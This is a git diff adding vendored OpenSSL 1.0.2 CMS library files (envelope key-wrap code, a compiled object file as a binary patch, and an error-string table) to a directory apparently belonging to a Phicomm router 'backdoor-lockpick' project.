+            CMSerr(CMS_F_CMS_ADD0_RECIPIENT_KEY, CMS_R_INVALID_KEY_LENGTH);
+            goto err;
+        }
+
+    }
+
+    /* Initialize recipient info */
+    ri = M_ASN1_new_of(CMS_RecipientInfo);
+    if (!ri)
+        goto merr;
+
+    ri->d.kekri = M_ASN1_new_of(CMS_KEKRecipientInfo);
+    if (!ri->d.kekri)
+        goto merr;
+    ri->type = CMS_RECIPINFO_KEK;
+
+    kekri = ri->d.kekri;
+
+    if (otherTypeId) {
+        kekri->kekid->other = M_ASN1_new_of(CMS_OtherKeyAttribute);
+        if (kekri->kekid->other == NULL)
+            goto merr;
+    }
+
+    if (!sk_CMS_RecipientInfo_push(env->recipientInfos, ri))
+        goto merr;
+
+    /* After this point no calls can fail */
+
+    kekri->version = 4;
+
+    kekri->key = key;
+    kekri->keylen = keylen;
+
+    ASN1_STRING_set0(kekri->kekid->keyIdentifier, id, idlen);
+
+    kekri->kekid->date = date;
+
+    if (kekri->kekid->other) {
+        kekri->kekid->other->keyAttrId = otherTypeId;
+        kekri->kekid->other->keyAttr = otherType;
+    }
+
+    X509_ALGOR_set0(kekri->keyEncryptionAlgorithm,
+                    OBJ_nid2obj(nid), V_ASN1_UNDEF, NULL);
+
+    return ri;
+
+ merr:
+    CMSerr(CMS_F_CMS_ADD0_RECIPIENT_KEY, ERR_R_MALLOC_FAILURE);
+ err:
+    if (ri)
+        M_ASN1_free_of(ri, CMS_RecipientInfo);
+    return NULL;
+
+}
+
+int CMS_RecipientInfo_kekri_get0_id(CMS_RecipientInfo *ri,
+                                    X509_ALGOR **palg,
+                                    ASN1_OCTET_STRING **pid,
+                                    ASN1_GENERALIZEDTIME **pdate,
+                                    ASN1_OBJECT **potherid,
+                                    ASN1_TYPE **pothertype)
+{
+    CMS_KEKIdentifier *rkid;
+    if (ri->type != CMS_RECIPINFO_KEK) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_KEKRI_GET0_ID, CMS_R_NOT_KEK);
+        return 0;
+    }
+    rkid = ri->d.kekri->kekid;
+    if (palg)
+        *palg = ri->d.kekri->keyEncryptionAlgorithm;
+    if (pid)
+        *pid = rkid->keyIdentifier;
+    if (pdate)
+        *pdate = rkid->date;
+    if (potherid) {
+        if (rkid->other)
+            *potherid = rkid->other->keyAttrId;
+        else
+            *potherid = NULL;
+    }
+    if (pothertype) {
+        if (rkid->other)
+            *pothertype = rkid->other->keyAttr;
+        else
+            *pothertype = NULL;
+    }
+    return 1;
+}
+
+int CMS_RecipientInfo_set0_key(CMS_RecipientInfo *ri,
+                               unsigned char *key, size_t keylen)
+{
+    CMS_KEKRecipientInfo *kekri;
+    if (ri->type != CMS_RECIPINFO_KEK) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_SET0_KEY, CMS_R_NOT_KEK);
+        return 0;
+    }
+
+    kekri = ri->d.kekri;
+    kekri->key = key;
+    kekri->keylen = keylen;
+    return 1;
+}
+
+/* Encrypt content key in KEK recipient info */
+
+static int cms_RecipientInfo_kekri_encrypt(CMS_ContentInfo *cms,
+                                           CMS_RecipientInfo *ri)
+{
+    CMS_EncryptedContentInfo *ec;
+    CMS_KEKRecipientInfo *kekri;
+    AES_KEY actx;
+    unsigned char *wkey = NULL;
+    int wkeylen;
+    int r = 0;
+
+    ec = cms->d.envelopedData->encryptedContentInfo;
+
+    kekri = ri->d.kekri;
+
+    if (!kekri->key) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_KEKRI_ENCRYPT, CMS_R_NO_KEY);
+        return 0;
+    }
+
+    if (AES_set_encrypt_key(kekri->key, kekri->keylen << 3, &actx)) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_KEKRI_ENCRYPT,
+               CMS_R_ERROR_SETTING_KEY);
+        goto err;
+    }
+
+    wkey = OPENSSL_malloc(ec->keylen + 8);
+
+    if (!wkey) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_KEKRI_ENCRYPT, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    wkeylen = AES_wrap_key(&actx, NULL, wkey, ec->key, ec->keylen);
+
+    if (wkeylen <= 0) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_KEKRI_ENCRYPT, CMS_R_WRAP_ERROR);
+        goto err;
+    }
+
+    ASN1_STRING_set0(kekri->encryptedKey, wkey, wkeylen);
+
+    r = 1;
+
+ err:
+
+    if (!r && wkey)
+        OPENSSL_free(wkey);
+    OPENSSL_cleanse(&actx, sizeof(actx));
+
+    return r;
+
+}
+
+/* Decrypt content key in KEK recipient info */
+
+static int cms_RecipientInfo_kekri_decrypt(CMS_ContentInfo *cms,
+                                           CMS_RecipientInfo *ri)
+{
+    CMS_EncryptedContentInfo *ec;
+    CMS_KEKRecipientInfo *kekri;
+    AES_KEY actx;
+    unsigned char *ukey = NULL;
+    int ukeylen;
+    int r = 0, wrap_nid;
+
+    ec = cms->d.envelopedData->encryptedContentInfo;
+
+    kekri = ri->d.kekri;
+
+    if (!kekri->key) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_KEKRI_DECRYPT, CMS_R_NO_KEY);
+        return 0;
+    }
+
+    wrap_nid = OBJ_obj2nid(kekri->keyEncryptionAlgorithm->algorithm);
+    if (aes_wrap_keylen(wrap_nid) != kekri->keylen) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_KEKRI_DECRYPT,
+               CMS_R_INVALID_KEY_LENGTH);
+        return 0;
+    }
+
+    /* If encrypted key length is invalid don't bother */
+
+    if (kekri->encryptedKey->length < 16) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_KEKRI_DECRYPT,
+               CMS_R_INVALID_ENCRYPTED_KEY_LENGTH);
+        goto err;
+    }
+
+    if (AES_set_decrypt_key(kekri->key, kekri->keylen << 3, &actx)) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_KEKRI_DECRYPT,
+               CMS_R_ERROR_SETTING_KEY);
+        goto err;
+    }
+
+    ukey = OPENSSL_malloc(kekri->encryptedKey->length - 8);
+
+    if (!ukey) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_KEKRI_DECRYPT, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    ukeylen = AES_unwrap_key(&actx, NULL, ukey,
+                             kekri->encryptedKey->data,
+                             kekri->encryptedKey->length);
+
+    if (ukeylen <= 0) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_KEKRI_DECRYPT, CMS_R_UNWRAP_ERROR);
+        goto err;
+    }
+
+    ec->key = ukey;
+    ec->keylen = ukeylen;
+
+    r = 1;
+
+ err:
+
+    if (!r && ukey)
+        OPENSSL_free(ukey);
+    OPENSSL_cleanse(&actx, sizeof(actx));
+
+    return r;
+
+}
+
+int CMS_RecipientInfo_decrypt(CMS_ContentInfo *cms, CMS_RecipientInfo *ri)
+{
+    switch (ri->type) {
+    case CMS_RECIPINFO_TRANS:
+        return cms_RecipientInfo_ktri_decrypt(cms, ri);
+
+    case CMS_RECIPINFO_KEK:
+        return cms_RecipientInfo_kekri_decrypt(cms, ri);
+
+    case CMS_RECIPINFO_PASS:
+        return cms_RecipientInfo_pwri_crypt(cms, ri, 0);
+
+    default:
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_DECRYPT,
+               CMS_R_UNSUPPORTED_RECPIENTINFO_TYPE);
+        return 0;
+    }
+}
+
+int CMS_RecipientInfo_encrypt(CMS_ContentInfo *cms, CMS_RecipientInfo *ri)
+{
+    switch (ri->type) {
+    case CMS_RECIPINFO_TRANS:
+        return cms_RecipientInfo_ktri_encrypt(cms, ri);
+
+    case CMS_RECIPINFO_AGREE:
+        return cms_RecipientInfo_kari_encrypt(cms, ri);
+
+    case CMS_RECIPINFO_KEK:
+        return cms_RecipientInfo_kekri_encrypt(cms, ri);
+        break;
+
+    case CMS_RECIPINFO_PASS:
+        return cms_RecipientInfo_pwri_crypt(cms, ri, 1);
+        break;
+
+    default:
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_ENCRYPT,
+               CMS_R_UNSUPPORTED_RECIPIENT_TYPE);
+        return 0;
+    }
+}
+
+/* Check structures and fixup version numbers (if necessary) */
+
+static void cms_env_set_originfo_version(CMS_EnvelopedData *env)
+{
+    CMS_OriginatorInfo *org = env->originatorInfo;
+    int i;
+    if (org == NULL)
+        return;
+    for (i = 0; i < sk_CMS_CertificateChoices_num(org->certificates); i++) {
+        CMS_CertificateChoices *cch;
+        cch = sk_CMS_CertificateChoices_value(org->certificates, i);
+        if (cch->type == CMS_CERTCHOICE_OTHER) {
+            env->version = 4;
+            return;
+        } else if (cch->type == CMS_CERTCHOICE_V2ACERT) {
+            if (env->version < 3)
+                env->version = 3;
+        }
+    }
+
+    for (i = 0; i < sk_CMS_RevocationInfoChoice_num(org->crls); i++) {
+        CMS_RevocationInfoChoice *rch;
+        rch = sk_CMS_RevocationInfoChoice_value(org->crls, i);
+        if (rch->type == CMS_REVCHOICE_OTHER) {
+            env->version = 4;
+            return;
+        }
+    }
+}
+
+static void cms_env_set_version(CMS_EnvelopedData *env)
+{
+    int i;
+    CMS_RecipientInfo *ri;
+
+    /*
+     * Can't set version higher than 4 so if 4 or more already nothing to do.
+     */
+    if (env->version >= 4)
+        return;
+
+    cms_env_set_originfo_version(env);
+
+    if (env->version >= 3)
+        return;
+
+    for (i = 0; i < sk_CMS_RecipientInfo_num(env->recipientInfos); i++) {
+        ri = sk_CMS_RecipientInfo_value(env->recipientInfos, i);
+        if (ri->type == CMS_RECIPINFO_PASS || ri->type == CMS_RECIPINFO_OTHER) {
+            env->version = 3;
+            return;
+        } else if (ri->type != CMS_RECIPINFO_TRANS
+                   || ri->d.ktri->version != 0) {
+            env->version = 2;
+        }
+    }
+    if (env->version == 2)
+        return;
+    if (env->originatorInfo || env->unprotectedAttrs)
+        env->version = 2;
+    env->version = 0;
+}
+
+BIO *cms_EnvelopedData_init_bio(CMS_ContentInfo *cms)
+{
+    CMS_EncryptedContentInfo *ec;
+    STACK_OF(CMS_RecipientInfo) *rinfos;
+    CMS_RecipientInfo *ri;
+    int i, ok = 0;
+    BIO *ret;
+
+    /* Get BIO first to set up key */
+
+    ec = cms->d.envelopedData->encryptedContentInfo;
+    ret = cms_EncryptedContent_init_bio(ec);
+
+    /* If error or no cipher end of processing */
+
+    if (!ret || !ec->cipher)
+        return ret;
+
+    /* Now encrypt content key according to each RecipientInfo type */
+
+    rinfos = cms->d.envelopedData->recipientInfos;
+
+    for (i = 0; i < sk_CMS_RecipientInfo_num(rinfos); i++) {
+        ri = sk_CMS_RecipientInfo_value(rinfos, i);
+        if (CMS_RecipientInfo_encrypt(cms, ri) <= 0) {
+            CMSerr(CMS_F_CMS_ENVELOPEDDATA_INIT_BIO,
+                   CMS_R_ERROR_SETTING_RECIPIENTINFO);
+            goto err;
+        }
+    }
+    cms_env_set_version(cms->d.envelopedData);
+
+    ok = 1;
+
+ err:
+    ec->cipher = NULL;
+    if (ec->key) {
+        OPENSSL_cleanse(ec->key, ec->keylen);
+        OPENSSL_free(ec->key);
+        ec->key = NULL;
+        ec->keylen = 0;
+    }
+    if (ok)
+        return ret;
+    BIO_free(ret);
+    return NULL;
+
+}
+
+/*
+ * Get RecipientInfo type (if any) supported by a key (public or private). To
+ * retain compatibility with previous behaviour if the ctrl value isn't
+ * supported we assume key transport.
+ */
+int cms_pkey_get_ri_type(EVP_PKEY *pk)
+{
+    if (pk->ameth && pk->ameth->pkey_ctrl) {
+        int i, r;
+        i = pk->ameth->pkey_ctrl(pk, ASN1_PKEY_CTRL_CMS_RI_TYPE, 0, &r);
+        if (i > 0)
+            return r;
+    }
+    return CMS_RECIPINFO_TRANS;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_env.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_env.o
new file mode 100644
index 0000000000000000000000000000000000000000..ab5f78a6c7daff2333fd2c74c5e911d3a4543168
GIT binary patch
literal 13136
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_err.c
new file mode 100644
index 0000000..15572ea
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_err.c
@@ -0,0 +1,309 @@
+/* crypto/cms/cms_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2013 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/cms.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_CMS,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_CMS,0,reason)
+
+static ERR_STRING_DATA CMS_str_functs[] = {
+    {ERR_FUNC(CMS_F_CHECK_CONTENT), "CHECK_CONTENT"},
+    {ERR_FUNC(CMS_F_CMS_ADD0_CERT), "CMS_add0_cert"},
+    {ERR_FUNC(CMS_F_CMS_ADD0_RECIPIENT_KEY), "CMS_add0_recipient_key"},
+    {ERR_FUNC(CMS_F_CMS_ADD0_RECIPIENT_PASSWORD),
+     "CMS_add0_recipient_password"},
+    {ERR_FUNC(CMS_F_CMS_ADD1_RECEIPTREQUEST), "CMS_add1_ReceiptRequest"},
+    {ERR_FUNC(CMS_F_CMS_ADD1_RECIPIENT_CERT), "CMS_add1_recipient_cert"},
+    {ERR_FUNC(CMS_F_CMS_ADD1_SIGNER), "CMS_add1_signer"},
+    {ERR_FUNC(CMS_F_CMS_ADD1_SIGNINGTIME), "CMS_ADD1_SIGNINGTIME"},
+    {ERR_FUNC(CMS_F_CMS_COMPRESS), "CMS_compress"},
+    {ERR_FUNC(CMS_F_CMS_COMPRESSEDDATA_CREATE), "cms_CompressedData_create"},
+    {ERR_FUNC(CMS_F_CMS_COMPRESSEDDATA_INIT_BIO),
+     "cms_CompressedData_init_bio"},
+    {ERR_FUNC(CMS_F_CMS_COPY_CONTENT), "CMS_COPY_CONTENT"},
+    {ERR_FUNC(CMS_F_CMS_COPY_MESSAGEDIGEST), "CMS_COPY_MESSAGEDIGEST"},
+    {ERR_FUNC(CMS_F_CMS_DATA), "CMS_data"},
